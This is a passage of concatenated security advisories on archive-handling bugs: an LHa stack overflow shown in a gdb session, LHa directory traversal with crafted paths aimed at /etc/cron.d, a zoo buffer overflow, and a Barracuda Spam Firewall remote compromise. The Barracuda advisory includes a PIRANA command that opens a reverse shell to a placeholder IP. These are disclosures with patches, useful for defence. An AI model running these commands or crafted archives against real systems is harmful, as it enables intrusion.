UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $ b) two directory traversal problems LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil". * ATTACHED FILES * I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives. * TIMELINE * 18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory // Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/ ------------------------------------------------------------------------ . TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow SECUNIA ADVISORY ID: SA19002 VERIFY ADVISORY: http://secunia.com/advisories/19002/ CRITICAL: Moderately critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: zoo 2.x http://secunia.com/product/8297/ DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive). The vulnerability has been confirmed in version 2.10. Other versions may also be affected. SOLUTION: Restrict use to trusted ZOO archives. PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Barracuda LHA archiver security bug leads to remote compromise Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, you can consult OSVDB #5753 and #5754 . III. IMPACT Gain shell access to the remote Barracuda Spam Firewall IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1 V. SOLUTION Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006. They also published an official patch in firmware #3.3.03.022, available April 3rd 2006. It is recommended to update to firmware #3.3.03.022 . VI. CREDITS Ulf Harnhammar who found the original LHA flaw. Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework. VII. REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234 VIII. HISTORY 2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public